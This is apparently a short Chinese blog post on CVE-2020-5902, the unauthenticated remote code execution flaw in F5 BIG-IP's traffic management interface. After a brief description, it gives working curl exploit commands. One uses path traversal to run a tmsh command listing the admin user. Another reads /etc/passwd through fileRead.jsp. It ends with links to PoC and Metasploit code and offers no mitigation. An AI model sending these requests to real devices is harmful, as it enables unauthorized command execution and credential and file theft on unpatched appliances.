天天看點

F5公司BIG-IP代碼執行漏洞 CVE-2020-5902CVE-2020-5902 漏洞

CVE-2020-5902 漏洞

漏洞描述

F5 BIG-IP 是美國F5公司一款內建流量管理、DNS、出入站規則、web應用防火牆、web網關、負載均衡等功能的應用傳遞平台。在 F5 BIG-IP 産品的流量管理使用者頁面 (TMUI)/配置實用程式的特定頁面中存在一處遠端代碼執行漏洞。未授權的遠端攻擊者通過向該頁面發送特制的請求包,可以造成任意Java 代碼執行。進而控制 F5 BIG-IP 的全部功能,包括但不限于: 執行任意系統指令、開啟/禁用服務、建立/删除伺服器端檔案等。

代碼執行:

curl -v -k ‘https://[F5 Host]/tmui/login.jsp/…;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin’

代碼執行可能會有權限問題

F5公司BIG-IP代碼執行漏洞 CVE-2020-5902CVE-2020-5902 漏洞

讀取檔案:

curl -v -k ‘https://[F5 Host]/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

F5公司BIG-IP代碼執行漏洞 CVE-2020-5902CVE-2020-5902 漏洞

參考連結:

https://github.com/jas502n/CVE-2020-5902 包含漏洞源程式代碼

https://www.anquanke.com/post/id/209767

https://twitter.com/x4ce/status/1279790599793545216

https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

繼續閱讀